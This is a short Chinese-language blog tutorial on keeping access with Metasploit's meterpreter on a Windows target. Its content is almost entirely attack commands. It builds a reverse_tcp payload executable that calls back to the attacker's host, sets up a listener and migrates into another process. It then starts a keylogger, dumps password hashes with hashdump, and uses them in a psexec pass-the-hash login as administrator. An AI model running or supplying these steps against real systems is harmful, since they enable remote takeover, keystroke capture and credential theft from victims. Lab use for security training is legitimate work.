最新消息:

MSF之meterpreter权限维持

Kali Linux Eternal 8866浏览 0评论

00×01

首先,我们先来生成一个 meterpreter 类型的 PALOAD :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe

20160820175521

00×02

建立反弹处理 exploit :

use exploit/mutil/handler

set payload windows/meterpreter/reverse_tcp

set LHOST=192.168.2.133

set LPORT=1211

exploit

20160820175728

00×03

当目标系统成功运行我们配置好的 PAYLOAD ,我们就会在Kali的console界面,反弹取得 shell 。此时,我们要做的第一件事,就是将我们 PAYLOAD 的当前进程,转移注入到另外个可以维持我们持续权限的进程上!

migrate 616

20160820180312

00×04

接下来,我们就可以在取得shell的console界面进行对目标系统的任意操作了!例如:我们可以打开一个键盘记录器:

keyscan_start 开启键盘记录

keyscan_dump 查看记录内容

keyscan_stop 停止键盘记录

20160820180519

00×05

同样,我们还可以 hashdump 目标系统上的所有账户密码 hash :

hashdump

20160820180718

00×06

当我们取得 hash 值后,我们可以利用 MSF 提供的 smb exploit 模块进行 hash 直接登录!

use exploit/windows/smb/psexec

use windows/meterpreter/reverse_tcp

set LHOST 192.168.2.133

set RHOST 192.168.2.131

set LPORT 1212

set SMBPass xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

set SMBUser administrator

QQ截图20160820183738

00×07

最后,我们运行 exploit 即可!

转载请注明:即刻安全 » MSF之meterpreter权限维持

您必须 登录 才能发表评论!

网友最新评论 (1)



合作伙伴